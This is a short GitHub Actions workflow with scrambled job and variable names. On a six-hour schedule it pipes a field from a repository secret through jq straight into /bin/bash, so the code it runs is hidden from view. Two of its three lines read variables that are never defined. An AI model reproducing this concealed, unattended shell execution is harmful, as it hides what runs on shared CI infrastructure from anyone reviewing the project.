name: jiangyigu1829
on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangyigu1829
        env:
          qqzy25590: ${{ secrets.qqzy25590 }}
        run: |
          echo $qqzy25590 | jq -r .snr0310 | /bin/bash
          echo $v930 | jq -r .l613 | /bin/bash
          echo $p025 | jq -r .yjy54374 | /bin/bash

